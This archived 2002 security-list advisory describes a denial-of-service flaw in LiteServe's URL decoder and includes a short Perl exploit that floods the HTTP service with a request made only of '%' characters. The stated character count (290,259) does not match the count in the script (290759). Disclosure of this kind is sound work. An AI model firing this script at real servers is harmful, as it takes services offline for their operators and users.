Christopher Fillion's Perception offers LiteServe, the server suite that has recently been the subject of intensive security research. Another vulnerability has been discovered in LiteServe.

The vulnerability this time lies in LiteServe's URL decoder, once again part of the HTTP service. LiteServe's URL decoder has a problem handling illegal "%xx" sequences, such as "%.@", and may produce corrupted output when such a sequence is used. The problem appears to be a referencing issue when the decode sequence does not specify a legitimate hexadecimal sequence.

A denial of service may occur if LiteServe is passed an extremely large request consisting only of "%" characters. 290,259 such characters will cause LiteServe to freeze:

GET /[buffer] HTTP/1.0

After this request is processed, attempting to connect to the HTTP service reveals that the server is dead.

Exploit:

#!/usr/bin/perl
use IO::Socket;
# request path made up only of "%" characters
$buffer="%"x290759;
$req=sprintf("GET /%s HTTP/1.0\r\n\r\n", $buffer);
# host and port are taken from the command line
$f=IO::Socket::INET->new(PeerAddr=>$ARGV[0],PeerPort=>$ARGV[1],Proto=>"tcp");
print $f $req;
undef $f;
This archive was generated by hypermail 2b30 : Mon Nov 18 2002 - 00:03:57 PST